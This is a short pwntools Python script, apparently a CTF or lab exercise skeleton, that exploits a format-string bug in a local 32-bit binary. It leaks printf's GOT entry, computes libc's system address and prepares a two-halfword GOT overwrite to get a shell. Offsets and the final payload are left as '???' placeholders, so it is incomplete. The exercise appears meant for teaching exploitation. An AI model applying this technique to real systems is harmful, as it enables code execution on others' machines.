#!/usr/bin/env python

from pwn import *

p = process('./fs-code-exec-32')

# arbitrary read -> read the GOT of printf
got_of_printf = p.elf.got['printf']

print(p.recv())
p.sendline(p32(got_of_printf) + "%7$s")

data = p.recv()
print(repr(data))

libc_printf = u32(data[???])
print(hex(libc_printf))

libc_system = libc_printf -  ??? + ???

lower_16_system = libc_system & 0xffff

first = lower_16_system - 8
second = (libc_system >> 16) - lower_16_system

while second < 0:
    second += 0x10000

print(hex(libc_system))
print(hex(first))
print(hex(second))

buf = p32(got_of_printf) + p32(got_of_printf + 2)
buf += ????

p.sendline(buf)
p.interactive()